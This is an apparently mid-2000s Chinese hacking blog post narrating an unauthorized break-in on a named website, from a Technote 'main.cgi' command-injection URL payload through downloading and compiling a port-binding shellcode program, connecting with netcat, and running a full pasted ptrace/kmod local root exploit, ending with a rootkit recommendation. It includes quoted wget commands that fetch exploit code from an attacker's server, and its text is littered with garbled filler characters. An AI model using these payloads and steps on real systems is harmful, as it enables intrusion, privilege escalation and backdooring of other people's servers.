从web漏洞到系统root权限过程全展现

韩冰

作者：cnbird

/ U. V, D7 g, d1 E' l

大家好，我是cnbird，我又回来了，好长时间没有写文章了，今天手痒痒，

g4 }* A( w5 n6 C+ E

所以就写了一篇，希望对与unix的初学者有帮助.欢迎大家和我讨论技术。MainpAge:http://cnbird.hackvip.cn

3 Y2 w# o5 E- I+ ~& \* O

最近在家研究perl和UNIX服务器的安装和应用，所以很长时间没有进行渗 透了，在学perl和UNIX的话就要傻了，什么也不会了，所以去各大黑客站点

转转吧，来到了www.nsfocus.net看看吧，有没有什么新的公告啊，Technote 'main.cgi'远程任意命令执行漏洞 这个漏洞引起了我的注意，大致看了看，

知道了这是一个可以远程执行命令的漏洞，下面把漏洞的信息公布一下，Technote是韩国的Technote公司开发的公告牌系统。

Technote的'main.cgi'没有充分过滤用户提交输入，远程攻击者可以利用这

个漏洞以WEB进程权限在系统上执行任意命令。

由于不正确过滤'filename'参数，攻击者提交包含"|command"的数据作为参

& t! u- K k2 r& u/ a3 [0 N9 ^$ W

数内容，可能以WEB进程权限在系统上执行任意命令。

, A5 c/ {# u- p4 y s1 L

给出利用方法

1 K0 Z& W: c' v

_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://[target]/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|

# Z; x) G' h' q$ ~! f

看了看利用方法觉得很简单，所以打算自己写一个perl的漏洞利用程序，

8 g6 C. Y8 z: N& A+ n2 D

看了半天，终于完成了，自己perl新学的原因，所以写的比较简陋，还要自己

# `3 L& S9 a' L: ?( P g) S

修改路径，很麻烦，我就不公布了，省的高手见笑。其实这个漏洞成功率还是

2 w: G- {" {' P0 k

很高的，基本上90%以上吧，对于咱们这些经常搞安全的应该说是一个好消息.

- {( k$ ~) l. ^- o' ~# d

^_^.

好了开始咱们这次难得的入侵之旅吧,这篇文章看着很简单，其实融合我多年

8 J6 c4 y G7 a5 n& }1 h

的经验（其实就1-2年）,首先要测试这个漏洞，先要找这样的论坛，

google.com就是方便，一下子找到了一大堆，好了随便挑一个进行测试吧，哈哈哈就拿你开口吧。

http://www.sealia.com/cgi-bin/technote/main.cgi首先大致看了看，然后就开始吧，

按照绿盟给出的公告测试一下，输入_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://www.sealia.com/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|

" F4 Q/ w1 G4 p: |$ x

结果如图1

大家看到结果了

uid=99(nobody) gid=99(nobody) groups=99(nobody) 下面就开始利用我自己写的程序来完成工作了，毕竟在IE里面输太麻烦了， 2 c( h5 P, i: O4 W- H6 ]我程序的工作 界面。如图2

依次输入IP和端口，就可以直接运行程序了，输入id呵呵，和IE里面基本上差

$ c4 ]7 j8 R/ R' [: S

不多，

如图3

呵呵到这里我想大家的思路就是上传一个webshell然后在webshell里面搞了，

其实我也有这样的想法，可是我已经习惯了UNIX的命令行模式了，虽然能写一个webshell，但是我并没有这样做，我的目的是拿到root权限，大家一定问了，你连主机都没有连上呢，你怎么拿到root啊，小伙子你问的不错，奖你个梨吃，呵呵，下面我的思路就是登陆到机器上面，上面大家已经看到了，我们id命令的输出是uid=99(nobody) gid=99(nobody) groups=99(nobody)，权限还是很低的，试试能不能拿到/etc/passwd然后跑密码，然后执行[www.sealia.com]$ cat /etc/passwd

3 g/ ^- f0 j( I' ]9 q& q

不错，能拿到/etc/passwd。

如图4

) a% J8 P1 d B

呵呵已经得到/etc/passwd了，我们用流光去跑密码吧，当然我没有指望它能跑出来，等待的时间真漫长啊，无聊，都已经5点50分了，天天晚上，哦哦不是晚上了，是早晨这个时候睡觉，然后12点起来，天天如此，哎，，苦啊。。。

去forum.zone-h.org看看帖子吧，也许能找到什么灵感呢！无意间来到了http://forum.zone-h.org/viewtopic.php?t=1168&highlight=phpbb他们正在讨论phpbb的漏洞利用方法和代码，看看吧，虽然已经很老很老了，呵呵其实说实话，不怕各位见小，我以前问在这里问过问题，很长时间没有来了，看看他们有没有给回复啊

5 @' y) t6 T/ x5 G- h# B# m

如图5

* u& ^1 G1 T8 H$ l& ? H* w+ ?% I i

$ M% l2 @/ q# C0 L& U$ h: q

呵呵见笑了，真没想到他们给的答案还很全面，^_^连什么程序都给出了，老外就是实在...呵呵...

0 o7 I% \1 n! A5 w

This one works fine

http://rst.void.ru/download/r57phpbb2010.txt

& G6 z! g/ n9 v0 y- b Y( V

upload, someth like this

./exploit.pl victimhost:port /php_root/ topic_num "wget -O /var/tmp/.r.c http://myhttpserver:port/exploit/root.c"

( C* H+ j' e( ^7 m8 Q

+ p$ ~; L5 ]& _+ S# a* q( q0 [; v: i./exploit.pl victimhost:port /php_root/ topic_num "gcc /var/tmp/.r.c -o .root"

* P* w( I3 a6 Sexec on victim hots same shit

" N5 z1 H5 {1 }- \6 `- Y* u9 _5 Z) l

and binding shell

: @" m' l1 n2 u

http://shellcode.org/Shellcode/Linux/shell-bind-shell.html

回答的让我很满意啊，正好就试试他们给的方法吧，其实以前我也知道这样的方法的就是没有binding shell（就是把/bin/sh绑定到端口上）。好了说了这么多离题的话，我们还是赶紧做我们的事吧.

! w) v( I% d/ O0 P) l/ ~

首先来到了http://shellcode.org/Shellcode/Linux/shell-bind-shell.html看了看，

This piece of code will open a socket for listening upon port 20000 and spawn a shell for all incoming connections.

This would be ideal for a system which you didn't have a direct login shell upon.

8 {$ z! O1 d, w, h N

从描述上来看是linux的binding shell，并且绑定到了20000端口，下面有该程序的下载地方，真方便啊，http://shellcode.org/Shellcode/Linux/shell-bind-shell.c

* k, _- X, z3 s& o% |/ X4 P

给出代码

$ h0 J5 l! X* P

/* 92 bytes iscntrl() evading portbinding shellcode - linux-x86 7 ?3 ?5 P; C0 o * - by bighawk (bighawk@warfare.com) * * This shellcode binds a shell on port 20000 * - z5 M4 K0 W {: { * stdin, stdout and stderr are dupped. accept() arguments are sane. */

, |/ c# K" v6 W/ \4 U- s) Q) h: r

char code[] =

"\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\xb0\x66" // mov al, 102 "\x53" // push ebx % \- X1 ]- g( m3 w1 I# d "\x43" // inc ebx , M; Q) [" |/ s5 }& n- v. { "\x53" // push ebx 6 h- A& o+ n- h/ _ r2 n "\x43" // inc ebx 2 k' U" G4 `) G. P: u1 { "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x4b" // dec ebx " X' O% @6 X x+ o "\xcd\x80" // int 80h "\x89\xc7" // mov edi, eax # u' b- W. i; r% W "\x52" // push edx - y8 \5 A. k1 k "\x66\x68\x4e\x20" // push word 8270 ' X' j% H9 t l! s! [ "\x43" // inc ebx "\x66\x53" // push bx % i1 g, b5 h1 ^( `9 N5 L "\x89\xe1" // mov ecx, esp & X1 e5 }$ @2 i$ Z: ]- W "\xb0\xef" // mov al, 239 : @, J+ i/ l D% `4 W% q* } f "\xf6\xd0" // not al "\x50" // push eax "\x51" // push ecx X; {8 _6 o1 @. J "\x57" // push edi "\x89\xe1" // mov ecx, esp # B e+ `: d' Y8 b$ X" { "\xb0\x66" // mov al, 102 # u: @4 ~2 J [! B7 \# M "\xcd\x80" // int 80h / o8 L1 E/ S3 i" W/ i% B "\xb0\x66" // mov al, 102 ; [$ t. N0 }' N "\x43" // inc ebx "\x43" // inc ebx "\xcd\x80" // int 80h # S6 n2 d/ @4 n2 `+ ]2 l "\x50" // push eax "\x50" // push eax 5 m1 u- u9 k# q& q* V "\x57" // push edi 7 Q& j c; X/ E "\x89\xe1" // mov ecx, esp "\x43" // inc ebx "\xb0\x66" // mov al, 102 . w/ h& d+ D/ r. J/ w9 J "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx "\x89\xc3" // mov ebx, eax ! [0 Q- y& p! n "\xb0\x3f" // mov al, 63 "\x49" // dec ecx 7 a8 j; t6 y% Z! c "\xcd\x80" // int 80h "\x41" // inc ecx ' J. b3 D+ N$ G% _/ L- x "\xe2\xf8" // loop lp "\x51" // push ecx "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx 4 _0 o. A% [( e. L0 u9 L* ` "\x53" // push ebx ( X* C* F: e' f: R" }3 m "\x89\xe1" // mov ecx, esp - p5 F1 C4 @; u5 Q+ ^2 G: O "\xb0\xf4" // mov al, 244 8 D/ N3 j$ Z) [5 B9 Z( D- p "\xf6\xd0" // not al ' R, C4 {' c- t "\xcd\x80"; // int 80h

/ I% Z" f8 V- A2 w% F1 z( w9 b

main() { ' H: p! t9 c# D( h! h# f4 o void (*a)() = (void *)code; int i; 0 U g; S2 U3 X. t* w# B& K$ k printf("size: %d bytes\n", strlen(code)); 8 [$ p1 K9 m( A5 q! h printf("Testing for cntrl characters.. "); for(i=0;i if(iscntrl(code)) printf("FAILED\n"), exit(255); + g* ~0 t' n" Y printf("PASSED\n"); 6 y5 ~) Q# g, a) z a(); } 好了我们已经知道该下载地址

韩冰

http://shellcode.org/Shellcode/Linux/shell-bind-shell.c了， : `0 e& |9 c% \0 L就可以用wget这个命令来下载了，输入 wget http://shellcode.org/Shellcode/Linux/shell-bind-shell.c -P /tmp意思 就是下载这个shell.c到/tmp目录下，如图6

: o0 m3 P) i- f' W( V0 ?4 x, A1 B6 h5 f然后ls /tmp得到下面的结果，[www.sealia.com]$ ls /tmpDate: Sat, 29 Jan 2005 22:17:14 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain 2bdlost+foundmremap_pte.cmysql.sockptrace.csess_0a3d59b6da83717a4c05fbc5c6429982sess_12981c19e4cdab7bc426af965e7c85desess_33c246570a69e0846eaaedaef61f0402sess_4eb43cb41a450e8a7d15998fe4e9ef82sess_5c2048e3188733f41bba9a1ab44a4f3bsess_6405a9b3e0a809d7f298ad598f5de180sess_67fc6892112d2d780a092664353dcbbasess_9e3a2581194c05f598543f10294a95edsess_a0332a716e5c0a0932331ce9a5ec64d2sess_a159ec1f21a671d5cfe201c384d8da1csess_c6f579b218f096eb5ba11fdbad90f248sess_cdea344ed2940c99c1fcc146c5322882sess_f1e8e705bb1a6c5197ab61a22442da90shell-bind-shell.cshell-bind-shell.c.1ssh-XX0CyKEcssh-XX7eRJNnssh-XX89utqmssh-XXEmor9Xssh-XXhC36Gwssh-XXpOcVIAssh-XXrhx8enssh-XXss6aKsssh-XXw2rzSs % {1 A! \4 r) v4 a0 y( V这个时候就说明已经成功了，现在我们查找一下gcc在哪里，别到时候闹了半天 在没有gcc就麻烦了，然后输入whereis -b gcc意思就是查找gcc的全路径输出结果 + E( ?0 b4 Z2 z. t1 h[www.sealia.com]$ whereis -b gccDate: Sat, 29 Jan 2005 22:21:06 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain 0 ^4 @( Z4 u4 B# [/ t% k4 F12gcc: /usr/bin/gcc 4 n* ~% f2 f: I/ A! _5 K好了找到gcc了，接下来的事就好办了，编译源程序gcc shell-bind-shell.c -o bind 7 T0 E5 m, |6 b' L% [7 n编译成功在/tmp目录下多了一个我们编译的bind程序，下面我们就来执行它吧， /tmp/bind程序执行的很慢哦.....大概等了1-2分钟程序执行完成，根据程序的介绍我 们知道他开了20000端口，我们telnet 上去吧，telnet www.sealia.com 20000 0 m' P$ p9 y, n7 a5 Z哈哈连接上了这个时候摸瞎输入id;uname -a 我晕怎么出现"command not found" ; ~- Y; d( K1 o0 p呢，我晕了，没错啊，看看源程序吧，找到了最后，哈哈知道了原因， & \0 ^6 d: X- Q) g: |, I/ yNote: To use this you will need to make sure that you append '\n\0' to your entered strings, otherwise you will receive errors saying "command not found".The following is a simple means of doing that: perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc hostname 20000 # r, P6 m! s5 w' e. a(nc is netcat).好了知道为什么了，我们就换nc提交吧，执行nc -vv www.sealia.com 20000然后出现了C:\WINDOWS\system32>nc -vv www.sealia.com 20000Warning: inverse host lookup failed for 61.100.181.12: h_errno 11004: NO_DATAwww.sealia.com [61.100.181.12] 20000 (?) open在黑暗中输入id输出结果uid=99(nobody) gid=99(nobody) groups=99(nobody)如图7

呵呵到这里我们可爱的流光还在跑呢，跑了将近半个小时了，不等了，关闭它，太浪费资源了，这个时候我大概知道他是一个linux的操作系统，但不知道内核版本输入uname -r 可以看到这个linux的内核iduid=99(nobody) gid=99(nobody) groups=99(nobody)uname -r2.4.20-31.92.4.20的，下面咱们来提升权限吧，就是拿到root，这里说明一下这里有2个很好用的漏洞利用程序，一个是Linux Kernel do_mremap VMA本地权限提升漏洞（漏洞利用程序下载地址_pte.c">http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c)和Linux kernel 2.2.x - 2.4.x ptrace/kmod local root exploit好了都准备好了，咱们开始提升权限吧，大家先把咱们要利用的程序输入到linux里面cd /tmp;cat >1.c然后复制代码右键输入代码/* * Linux kernel ptrace/kmod local root exploit * * This code exploits a race condition in kernel/kmod.c, which creates * kernel thread in insecure manner. This bug allows to ptrace cloned * process, allowing to take control over privileged modprobe binary. * * Should work under all current 2.2.x and 2.4.x kernels. * * I discovered this stupid bug independently on January 25, 2003, that * is (almost) two month before it was fixed and published by Red Hat * and others. % x- u7 ~9 ]' ~4 ?+ _9 D2 C5 y* - @! e" X9 k2 @' l& D; J; \2 h* Wojciech Purczynski <cliph@isec.pl> 3 |0 |& I1 \" x4 z# X6 s: K* 1 N' B; a# O6 p) d8 U+ h* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* 5 n+ l" ~5 c" z, c" W" T* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY 7 X3 c5 x6 n& i) j6 ]0 o2 S* 0 s2 Q$ s: F5 E* (c) 2003 Copyright by iSEC Security Research */

#include #include #include #include #include 7 l" ~8 Z& N- y7 H. b; m#include #include 2 f1 X, c% M+ k$ l+ U. K: D9 X#include #include #include T/ @+ K( Z- {2 A#include $ B" ]2 [( C }& d0 ]#include % I" j% `4 r8 C7 ^% r#include #include 3 E# Z* e6 b7 R#include #include

char cliphcode[] = : ?: ?! \1 x5 f( O) V2 ]$ E! G"\x90\x90\xeb\x1f\xb8\xb6\x00\x00" "\x00\x5b\x31\xc9\x89\xca\xcd\x80" , ^1 q2 V3 ~: j0 T' R' y( j0 C6 y- P"\xb8\x0f\x00\x00\x00\xb9\xed\x0d" 7 y: H2 N. d/ {& M8 f" A4 e \+ P"\x00\x00\xcd\x80\x89\xd0\x89\xd3" ( Q5 b7 H4 ~% [9 ?! K"\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1; pid_t child = 1; , j. g7 U; X- T. y) o+ gpid_t victim = 1; volatile int gotchild = 0;

void fatal(char * msg) { % J: g/ Y# w1 t; P5 ~5 g6 ?, f6 Sperror(msg); / t4 Q) E& q6 nkill(parent, SIGKILL); kill(child, SIGKILL); 1 P7 n8 f) i$ G7 {kill(victim, SIGKILL); * N( J7 J6 q( d( f, G" k}

void putcode(unsigned long * dst) `. W4 P! S. B" ]0 ]/ f3 G& }; I& p{ char buf[MAXPATHLEN + CODE_SIZE]; unsigned long * src; int i, len;

memcpy(buf, cliphcode, CODE_SIZE); len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1); if (len == -1) 8 m9 D& b, ~% j6 nfatal("[-] Unable to read /proc/self/exe");

len += CODE_SIZE + 1; 9 O+ d* h* P* m: |7 l7 j/ t7 d2 B2 Wbuf[len] = '\0';

src = (unsigned long*) buf; for (i = 0; i < len; i += 4) # \ {& |6 @6 _7 m) W/ Xif (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1) ! j2 A# y. E; W2 ]( |fatal("[-] Unable to write shellcode"); 9 i& V) `0 X+ X4 |2 K}

void sigchld(int signo) 2 d: _; Z3 c, u" t2 a6 N P3 F{ ' P& ]$ b& u! o. k d% u! W, Ustruct user_regs_struct regs;

if (gotchild++ == 0) return;

fprintf(stderr, "[+] Signal caught\n");

if (ptrace(PTRACE_GETREGS, victim, NULL, 畇) == -1) . G8 M$ F& m0 w* hfatal("[-] Unable to read registers");

fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);

putcode((unsigned long *)regs.eip);

fprintf(stderr, "[+] Now wait for suid shell...\n");

if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1) - v% A5 O% m- Y+ T* q8 Ffatal("[-] Unable to detach from victim");

exit(0); 1 z0 Z: h2 l" ]" E* J}

void sigalrm(int signo) { errno = ECANCELED; ' a% R7 P; J2 E0 `% l6 ufatal("[-] Fatal error"); }

void do_child(void) ! l" ~) u& V) l5 n$ J, s& w* \ h: u{ int err;

child = getpid(); 3 Y& a/ T% J" C2 Z/ dvictim = child + 1;

signal(SIGCHLD, sigchld);

do err = ptrace(PTRACE_ATTACH, victim, 0, 0); / `4 j5 D v6 jwhile (err == -1 && errno == ESRCH);

if (err == -1) fatal("[-] Unable to attach");

fprintf(stderr, "[+] Attached to %d\n", victim); 0 F' p" ]! L2 i- f) J; R# }2 dwhile (!gotchild) ; if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1) fatal("[-] Unable to setup syscall trace"); fprintf(stderr, "[+] Waiting for signal\n");

for(;;); ) E) i2 D# w8 U$ ]5 R; O3 `& D}

void do_parent(char * progname) { struct stat st; int err; ) n- q( a s, {: o1 v% eerrno = 0; " _! X1 V W0 Zsocket(AF_SECURITY, SOCK_STREAM, 1); do { err = stat(progname, &st); } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);

if (err == -1) 5 H2 v$ h4 C9 V. ?fatal("[-] Unable to stat myself");

alarm(0); 5 b, F( o+ C4 b* \, `& Qsystem(progname); }

void prepare(void) 1 h" A) Z( A; x4 i{ if (geteuid() == 0) { ! ]' a4 u0 i5 _1 sinitgroups("root", 0); setgid(0); / `8 y9 Q' W. z1 N% m, g8 Ysetuid(0); execl(_PATH_BSHELL, _PATH_BSHELL, NULL); fatal("[-] Unable to spawn shell"); } }

int main(int argc, char ** argv) 1 t& f$ u& N; o+ ]$ q5 f{ prepare(); / \& w: z \$ `, F+ nsignal(SIGALRM, sigalrm); alarm(10);

parent = getpid(); child = fork(); 1 }" Q' K6 R$ f" evictim = child + 1;

if (child == -1) fatal("[-] Unable to fork");

if (child == 0) , ^3 H* @7 c: b* P9 Bdo_child(); else do_parent(argv[0]);

return 0; }CRTL+C保存，然后编译gcc 1.c -o 1编译成功，然后输入./1程序开始执行了，-> Parent's PID is 2313. Child's PID is 2314.-> Attaching to 2315...-> Got the thread!!-> Waiting for the next signal...-> Injecting shellcode at 0x4000e85d-> Bind root shell on port 24876... =p-> Detached from modprobe thread.-> Committing suicide..... iduid=0(root) gid=0(root) groups=0(root)哈哈到这个时候我们已经是root了，剩下的工作就是安装后门了，大家可以参考我另外的一篇文章，more.asp?name=cnbird&id=522还有推荐一个不错的rootkitpacketstormsecurity.org/UNIX/penetration/rootkits/lrk5.src.tar.gz好了到这里所有的工作就算已经完成了，其实从入侵中我们可以看出来我们做网站的一定要重视web漏洞，这一点点的小漏洞就可以把能拿到系统的最高权限，可见其危害性，希望国内的网管能够重视起来.